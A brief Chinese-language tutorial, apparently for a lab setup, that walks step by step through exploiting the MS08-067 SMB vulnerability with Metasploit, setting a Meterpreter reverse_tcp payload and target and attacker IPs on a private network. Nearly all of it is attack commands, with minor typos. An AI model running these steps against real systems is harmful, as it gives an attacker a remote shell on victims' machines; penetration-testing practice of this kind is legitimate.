kali-matasploit
1、进入msf终端后,使用search功能搜索ms08-067,发现有一个可用模块:
>msf > search ms08-067
2、使用use命令选定要利用的模块:
msf > use exploit/windows/smb/ms08_067_netapi
3、设置攻击载荷为基于Windows系统的Meterpreter reverse_tcp
set PAYLOAD windows/meterpreter/reverse_tcp
4、使用“show targets”命令让我们识别和匹配目标操作系统的类型。
msf exploit(ms08_067_netapi) > show targets
E
5、选定系统编号(TARTGET),设置靶机IP(RHOST)与本机IP(LHOST)
msf exploit(ms08_067_netapi) > set TARGET 17
TARGET => 17
msf exploit(ms08_067_netapi) > set RHOST 192.168.116.129
RHOST => 192.168.116.129
msf exploit(ms08_067_netapi) > set LHOST 192.168.116.128
LHOST => 192.168.116.128
6、使用“show options”命令查看当前参数设置情况:
msf exploit(ms08_067_netapi) > show option
7、参数检查无误后,输入“exploit”对靶机进行攻击。当返回meterpreter提示符表示利用成功。
msf exploit(ms08_067_netapi) > run